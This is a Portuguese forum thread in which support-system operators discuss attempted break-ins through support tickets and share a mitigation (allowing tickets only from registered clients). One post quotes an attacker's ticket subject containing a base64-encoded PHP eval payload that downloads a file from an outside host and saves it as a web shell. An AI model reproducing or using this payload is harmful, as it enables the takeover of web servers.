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Postado

aconteceu mesma coisa comigo mais chego por ticket mais ele não mudou a senha nem

entrou no admin, tinha acontecido semana passada e ele mudo a senha mais não entrou.

Postado

+ 1 para coleção

Departamento: Abuse e SPAM

Assunto: {php}eval(base64_decode('JGNvZGUgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2Jsb2dnZXIuY29tLnRlcm5hdGVrb3RhLmdvLmlkL3RleHQvd3NvYjIucGhwJyk7CiRmbyA9IGZvcGVuKCJ3c29iMi5waHAiLCJ3Iik7CmZ3cml0ZSgkZm8sJGNvZGUpOw==')){/php}

Prioridade: Medium

IP: 103.10.64.30

IP Country: id.png Indonesia

-------------------------

Lembrando que ele so conseguiu criar o ticket, porque o departamento estava livre para criar tickets para não clientes.

Permitir abertura de tickets no departamento somente para clientes registrados.

Opções/Suporte/Departamentos de Suporte, edite o departamento desejado e ative

(Permitir abertura de tickets nesse departamento somente por clientes registrados)

Postado

Há alguns dias atrás recebi no meu sistema diversos cadastros (76 para ser mais exato) com três IP's diferentes vindos do Japão em dois dias, nos primeiros até tentamos contatar os responsáveis pelos registros mas não obtivemos nenhuma resposta. Não sei ao certo se isso foi uma tentativa de invasão mas foi um caso atípico

Postado

Pessoal, por que isso esta acontecendo? Simples, os códigos para invasão foram todos divulgados publicamente, aqui no fórum, então o "palhaço" que esta tentando invadir, pegou os códigos aqui no fórum e saiu enviando para todas as empresas. Esses códigos jamais deveriam ser publicados assim.

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